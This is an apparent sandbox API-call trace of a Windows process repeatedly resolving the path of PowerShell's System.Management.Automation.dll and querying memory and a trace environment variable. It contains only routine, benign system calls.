	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.324] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.325] GetLastError () returned 0xcb
	[0171.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d964, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.494] GetLastError () returned 0xcb
	[0171.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.494] GetLastError () returned 0xcb
	[0171.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.494] GetLastError () returned 0xcb
	[0171.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.494] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d964, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d964, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d914, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.516] GetLastError () returned 0xcb
	[0171.516] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.518] GetLastError () returned 0xcb
	[0171.669] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.682] GetLastError () returned 0xcb
	[0171.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.683] GetLastError () returned 0xcb
	[0171.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.683] GetLastError () returned 0xcb
	[0171.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.685] GetLastError () returned 0xcb
	[0171.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.686] GetLastError () returned 0xcb
	[0171.961] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.961] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0173.636] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0173.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0173.745] GetLastError () returned 0xcb
	[0175.585] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x5c2628
	[0175.585] GetLastError () returned 0x0
	[0175.587] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x5c26b0
	[0175.587] GetLastError () returned 0x0
	[0177.643] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.770] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.793] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.796] VirtualQuery (in: lpAddress=0x10c544, lpBuffer=0x10d544, dwLength=0x1c | out: lpBuffer=0x10d544*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.308] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.309] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.310] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.311] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.312] VirtualQuery (in: lpAddress=0x10ce90, lpBuffer=0x10de90, dwLength=0x1c | out: lpBuffer=0x10de90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.432] GetLastError () returned 0xcb
